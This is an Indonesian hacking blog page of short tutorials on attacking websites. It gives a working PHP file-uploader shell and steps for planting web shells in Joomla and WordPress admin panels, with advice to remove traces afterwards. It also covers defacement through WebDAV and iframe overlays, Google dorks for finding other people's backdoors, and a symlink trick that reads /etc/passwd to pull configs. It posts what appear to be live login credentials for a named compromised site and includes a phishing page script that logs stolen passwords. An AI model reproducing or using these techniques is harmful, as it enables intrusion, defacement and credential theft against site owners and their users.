PPC Iklan Blogger Indonesia

Jumat, 31 Mei 2013

0 Cara Upload Shell Di Joomla Full Tutorial ( 4 Trick )

00.40 Under From Unknown
[0 Comment]
kali ini ane mo share sdikit bbrpa trik buat upload shell di CMS joomla. mungkin udah pada tau yaa.. (ato mungkin repost Sinis)
kali aja ada yg belom tau, kaya newbie seperti ane.

okedeh, langsung ke tutorialnya aja.
pertama, yang pasti udah dapet akses ke admin panel joomla nya. ane ga bahas gimana cara dapetin akses admin nya. entah SQLi, jumping, symlink, ,etc.

CARA 1
masuk ke menu site > global configuration. trus klik bagian system
perhatikan bagian media setting,
trus di sub bagian
[+]Legal Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Restrict Uploads --> pilih NO
[+]Check MIME Types --> pilih NO
[+]Legal Image Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Legal MIME Types --> tambahin image/php

Spoiler: hide
[Image: jom15_zps5d089831.png]
klo udah save. stelah itu..
pergi ke media manager (site > media manager) upload shellnya disitu.
Spoiler: hide
[Image: jom13_zps46408fd5.png]
udah ke upload :D , lokasi shell ada di http://korban.com/images/namashell.php
Spoiler: hide
[Image: jom14_zps9182e03f.png]


CARA 2
secara konsep sih sama, disni ane dpetnya joomla versi 1.5.18 , klo versi yg laen.. silakan menyesuaikan. :p
Klik menu Extension > template manager
Spoiler: hide
[Image: jom1_zps8519f91b.png]
trus pergi di bagian administrator.
Spoiler: hide
[Image: jom2_zpsd4100d72.png]
kemudian seleksi nama template admin yg aktif, trus klik edit. klo udah pilih lagi edit html.
kan udah muncul tuh editornya, tinggal kita sisipin aja uploader.
buat yg belom punya uploader, bisa ngambil disini --> http://fake.hol.es/123/shell/simple_uploader.txt
ato ini
Spoiler: hide
PHP Code:
<?phpecho '<b>E1nzte1N uploader</b>';
echo 
'<b><br><br>'.php_uname().'<br></b>';
echo 
'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo 
'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( 
$_POST['_upl'] == "Upload" ) {
if(@
copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES Dab!!!</b><br><br>'; }
else { echo 
'<b>JANCOOK !!! Upload GAGAL !!!</b><br><br>'; }
}
?>
mari kita sisipin uploadernya, ane taro dibawah aja.
Spoiler: hide
[Image: jom4_zps8c473e97.png]
klo udah. save aja.
sukses. dan uploader kita udah nongol dibawah :) tinggal kita upload shell kita.
Spoiler: hide
[Image: jom5_zpsc119e561.png]
setelah upload shell, kita coba akses shell kita. letak file yg udah di upload, itu ada di http://korban.com/administrator/namashell.php
Spoiler: hide
[Image: jom6_zpsb46f9ae3.png]
*kalo ane : biasanya ane balikin lg template admin td ke semula, yg ga ada uploadernya. ane remove lg script uploadernya. biar ga ketauan.
:)

CARA 3
masi dlm masalah edit mengedit template. kali ini kita pake cara edit template yg laen.
kita ke extension > template manager. kali ini kita edit template site nya. tp bukan yg sedang dipakai. (klo yg template admin td kan nyari template yg lg aktif)
skrng kita pilih template site yg sedang tidak aktif. (tanda kalo template itu aktif, ada tanda bintangnya)
klik aja nama template yg ga aktif. misal: beez
trus pilih edit html. klo udah muncul editornya, langsung dah kita replace dengan script shell kita
Spoiler: hide
[Image: jom7_zpsde233746.png]
klo udah silakan disave. nah.. skrng kita coba menuju shell kita.
letak posisi shell uda ane jelasin di gambar diatas. yaitu : http://korban.com/templates/beez/index.php
Spoiler: hide
[Image: jom8_zpsa2810d4a.png]
:)

CARA 4
lagi lagi pake template.
kali ini kita coba upload template baru yg udah kita sisipin shell.
cari aja sembarang template joomla, sesuaiin kompatibilitasnya dg versi joomlanya.
contoh : ane download template siteground. klo udah, ekstrak aja templatenya. trus masukin shell kita. terserah mo ditaro dimana
misal: di dlm folder images/namashell.php
Spoiler: hide
[Image: jom9_zps0a6b1c1f.png]
klo udah kita archive lg templatenya. bentuknya *.zip ya..
klo udah oke, kita upload ke korban.
masuk ke extension> install/uninstall trus upload dah, template "evil" kita td :p
setelah sukses upload. skrng kita cek, dimana lokasi shell kita. masuk ke template manager. trus klik nama template yg baru saja kita tambahin.
ane td install template siteground. liat bagian kanan, ada parameters.
Spoiler: hide
[Image: jom10_zpscc71a5bb.png]
Quote:The parameter file /templates/siteground-j15-196/params.ini is writable!
bagian merah, itu lokasi shell kita. tinggal kita sesuaiin dimana kita naro shellnya td. klo ane td masukin di folder images.
jd lokasi shellnya ada di http://korban.com/templates/siteground-j...ashell.php
Spoiler: hide
[Image: jom11_zpsa71b6771.png]
:)

hmmhh.. baru segitu cara ane,
mari diskusi disini, cara cara yg laennya. yang punya trik laen (kalo mau sih) share juga dimari.
soalnya pernah juga nemu site yg kgak bisa pake ke empat cara diatas.

okedeh, sekian tutorial cupu bin jadul. dr ane.
Read More »

1 Cara Deface Dengan Tools Webdav

00.35 Under From Unknown
[1 Comment]
ane mau ngasih tau cara pepes index with webdav
to the point aja yaak Huwaa

sebelumnya maaf Threadnya blepotan masih newbie maen forum Takut

* Yang pertama, download dulu Webdavnya Dimari

* kalo udah selesai extract rar (saya sarankan extract ke desktop biar gampang)

* jika sudah di extract klik rootkit.exe

*Kalau udah kebuka, pilih tab webdav
Spoiler: hide
[Image: web.png]

*klik webdav lalu akan muncul seperti ini, kemudian pilih Asp shell maker dengan cara di klik.
Spoiler: hide
[Image: web-1.png]

*nanti keluar gambar begini gan :D
Spoiler: hide
[Image: web-2.png]

*Shell di setting jangan diganti gan ! biarkan seperti itu, lalu klik add site trus masukan web target anda :D
Spoiler: hide
[Image: web-4.png]

* langkah selanjutnya yaitu klik Serang dan berdoa semoga situs yang kita serang adalah situs yg vuln.
Spoiler: hide
[Image: web-5.png]

*kalo muncul seperti gambar diatas vuln kalo tidak berarti tidak vuln.. langkah berikutnya kunjungi websitenya nanti keluar tampilan sebagai berikutt
Spoiler: hide
[Image: web-6.png]

*cari tulisan index.html atau index.asp dan lain2 lalu klik icon pensil yg ada di webnya gambari dibawah
Spoiler: hide
[Image: web-7.png]

*nanti keluar gambar seperti ini..
Spoiler: hide
[Image: web-8.png]


*langkah selanjutnya tinggal mengganti tulisan yang ada di kotak biru dengan shell agan :D lalu klik 'kaydet' jangan seneng dulu setelah klik kaydet ada bacaan di pojok kiri ? seperti ini File Edited Successful:)itu berhasil !

lalu tinggal lihat deh index yang kita pepes Taraaaa wakakawakakawakaka
Spoiler: hide
[Image: web-9.png]


BABAAAAY minta Kamsia sama Cendol nya gan
Read More »

0 Cara Mencari Backdoor Dengan Google Dorks

00.27 Under From Unknown
[0 Comment]
[1]tempell dulu dork di google Ganteng
DORK

Quote:inurl:shell.php intext:rw-r--r--
inurl:/b374k.php
DORK LAINYA :
Spoiler: hide
inurl:c99.php
inurl:c99.php uid=0(root)
root c99.php
"Captain Crunch Security Team" inurl:c99
download c99.php
inurl:c99.php
inurl:"/c99.php"
inurl:"c99.php" c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
c99 shell v.1.0 (roots)
inurl:c99.php
allintitle: "c99shell"
intitle:C99Shell v. 1.0 pre-release +uname
intitle:C99Shell v. 1.0 pre-release +uname
inurl:/c99.php+uname
c99shell [file on secure ok ]?
powered by Captain Crunch Security Team
"c99.php" filetype:php
"inurl:c99.php"
c99. PHP-code Feedback Self remove
c99shell
intitle:C99Shell v. 1.0 pre-release +uname
safe-mode: off (not secure) drwxrwxrwx c99shell
c99.php download
c99shell filetype:php -echo
c99shell powered by admin
inurl:c99.php uid=0(root)
C99Shell v. 1.0 pre-release build #5
--[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetype:php
intitle:C99Shell v. 1.0 pre-release +uname
"Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:!C99Shell v. 1.0 pre-release build #16! root
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
--[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build #16 download
intitle:c99shell "Software: Apache"
allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
!C99Shell v. 1.0 pre-release build #5!
c99shell v. 1.0 release security
c99shell v. 1.0 pre-release build
c99shell [file on secure ok ]?
C99Shell v. 1.3
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
"C99Shell v. 1.0 pre"
=C99Shell v. 1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. pre-release build
powered by Captain Crunch Security Team
!C99Shell v. 1.0 pre-release build #5!
intitle:"c99shell" filetype:php root
intitle:"c99shell" Linux infong 2.4
C99Shell v. 1.0 beta !
C99Shell v. 1.0 pre-release build #
allintext:C99Shell v. 1.0 pre-release build #12
"C99Shell v. 1.0 pre"
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:C99Shell pre-release
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16!
C99Shell v. 1.0 pre-release build #16 administrator
intitle:c99shell filetype:php
C99Shell v. 1.0 pre-release build #12
c99shell v.1.0
"c99shell v. 1.0 pre-release build"
inurl:"c99.php" filetype:php
"c99shell v. 1.0 "


[2] oke Ganteng terus klik dah tuh salah satu hasil pencarian ....

[3]
-Coba satu2 Web ... kalau ngak bisa , berarti backdoornya udah dihapus , jadi coba web yang lain wakaka

-Kalau Sukses ni Contoh hasilnya....
Spoiler: hide
[Image: shelll.jpg] Cheer

NI.. om Contoh Hasil pepes : http://www.iek-se.eu/content/wp-content/uploads/

Semoga Berhasil Ganteng
Read More »

Kamis, 30 Mei 2013

2 Tutorial Deface Dengan JS Overlay (mudah kok )

09.54 Under From Unknown
[2 Comment]
Kali ini saya akan share teknik deface yang "jarang" digunakan karena ini mungkin menjadi alternatif terakhir jika kita gagal memasang shell pada web target. Ada kalanya sebuah web tidak support file php [kalo ini masih bisa di tamper], atau Web tersebut tidak menyediakan fasilitas upload.

Lalu bagaimana solusinya agar kita bisa men-deface web tersebut ? Dengan JS Overlay. Sistem kerjanya berbeda dengan teknik deface yang didahului dengan mengupload shell. Jika shell diupload, maka biasanya script asli yang diganti. Namun untuk JS Overlay, halaman asli web tersebut "ditimpa" oleh halaman deface yang kita buat. Jadi halaman asli tersebut tetap ada namun ditutup oleh script deface kita. Caranya ?

Sebelumnya kalian membutuhkan script deface yang sudah tertanam di web lain. Jika sebelumnya belum pernah melakukan deface, kalian bisa membuat web/blog sendiri, dideface sendiri hanya sebagai "umpan" dari JS Overlay.

Sebagai contoh, target kita kali ini adalah Lokomedia. Seharusnya bisa upload shell. namun sudah saya coba berkali-kali tidak bisa. Mungkin sudah diantisipasi oleh Webmasternya. Makanya saya coba menggunakan metode JS Overlay.

Oke, kita mulai tutorialnya :
Login ke web target. Buat post baru/kalian bisa mengedit judul/nama dari web tersebut.

Masukkan script ini di bagian judul :
<center><iframe src='[situs yang pernah dideface]' height='820px' width='1100px' scrolling='no' frameborder='0'></center>
Untuk tulisan berwarna merah silahkan diganti dengan url kalian sendiri. Intinya kita memanggil script dari url tersebut untuk menutupi halaman yang akan kita deface.
Untuk contoh, ini script saya :
<center><iframe src='http://personal-jsoverlay.blogspot.com/' height='820px' width='1100px' scrolling='no' frameborder='0'></center>


Lalu klik save.
Done. Kita lihat..


Teknik ini [sepertinya] bisa digunakan di semua CMS. Entah itu Lokomedia, Joomla, WP, dll.
Kekurangan dari teknik ini adalah kita hanya punya sekali akses ke web korban karena kita tidak bisa menanam backdoor.

Tutorial ini hanya sebagai pembelajaran. Gunakan sebaik-baiknya.



Read More »

0 Cara baypass Config (lengkap video )

03.41 Under From Unknown
[0 Comment]
assalamualaikum wr.wb
hasil ane jalan-jalan di forum sebelah wakaka
Kali ini saya akan memberi tutor symlink buat dapetin config 1 host
Tutor ini saya dapatkan dari agan s13doeL MC, Voniz_mati dan yogyacarderlink.
Saya misalkan file symlink saya namanya a.pl
Secara singkat,langkahnya seperti ini:

1. Masuk ke Shell/Backdoor yg anda sudah tanam

2. Buat direktori baru,terserah anda pada direktori writable di site itu

3. Upload file a.pl dan htaccess di folder yg anda buat

4. Ubah permission file a.pl menjadi 755 agar bisa di eksekusi

5. Baca file di /etc/passwd ,kemudian copy semua isi di file tersebut

6. Eksekusi file a.pl [http://site.com/directoriandamenaruhfile/a.pl]

7. Paste-kan semua isi file passwd tadi

8. Klik Get Config !

9. Jika sudah,kembali ke direktori anda tadi [http://site.com/direktoriandamenaruhfile/]

10. Jreeng jreng,terlihat banyak file txt disitu

11. Have fun

File a.pl ini hanya dapat mencari file yg letaknya di /home/[user]/public_html/ ,jika site anda mempunyai lokasi direktori yg berbeda,silahkan anda coding lagi script perl nya

link download a.pl +video tutor (dari pembuat aslinya) + httacces
cekidot

*note : didalamnya ada shell 404 nya juga dan ada video bonus Love
itu asli dari pembuatnya, ane ga berani ganti Huwaa
menerima ++ juga kalo berkenan wakakawakaka
Read More »

0 Cara Upload Shell Di wordprees harus Dengan melewati FTP Password

03.40 Under From Unknown
[0 Comment]
Terkadang masuk ke Dashboard Wordpress, terkendala dengan Upload Shell..
Cara umum spt
Install Themes/Plugins harus melewati FTP Password
[Image: wp2.png]

Editor Themes/Plugins juga nggak dijinkan
[Image: wp1.png]

Kita akan coba melewati proteksi tersebut, dan sepanjang kasus yg saya lewati nyaris 100% berhasil.


Code:
Kembali ke upload untuk themes ex : "http://target/wp-admin/theme-install.php?tab=upload"
dan langsung aja upload shell kamu, dalam format "php"
[Image: wp3.png]

Saat muncul identify FTP Password, berarti shell anda sudah terupload :)
Tempat Shell biasanya di
- /wp-content/uploads/shell.php
- /wp-content/uploads/YYYY/MM/shell.php
- /wp-content/upgrade/shell.php

[Image: wp4.png]

#wink
[Image: wp5.png]


Lanjutannya :
http://cemengin.tv/deb.html
http://hack-db.com/374628.html

=======================================
Langsung praktek =

http://cemengin.tv/wp-login.php
username = gececi_16
password = 1122qqww

Jangan rubah password yah..., dan jangan merusak content website.
Read More »

1 Cara membuat Phising Di Site apa aja ( Full tutorial )

03.00 Under From Unknown
[1 Comment]
qeqeqe ...
iseng2 gak ada kerjaan nemu tutor phising dari luar langsung aja dishare dimari ....
phising bisa buat situs apa aja, kaya rs, paypal dll ...

lanjut aje ye kita mulai ...

1. pilih site target yg mau dijadiin halaman phising
2. liat source codenya, klik kanan => source bisa juga ctrl+u trus save jadi index.htm
3. buka index.html yg tadi pake notepad, cari kata "action=" biasanya ketemu yg kaya gini
Code:
<form action="RANDOM URL" method="post">
4. ganti url "RANDOM URL" jadi write.php trus ganti "post" jadi get
5. save
6. bikin "write.php"
Code:
<?php
header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
7. ganti tulisan yg http://RANDOM diatas jadi alamat yg diphising misal http://facebook.com
8. save
9. upload deh dalam direktori yg sama ... ;))

sekian dari ane ... Malu
btw repost gak yah ? klo repost delete aja ... Sedih
nb : chmod 777 di file password.txt

CMIIW

------
"In my opinion MS is a lot better at making money than it is at making good operating systems"
*Linus Torvalds
[Image: 2vlun1f.jpg]
Read More »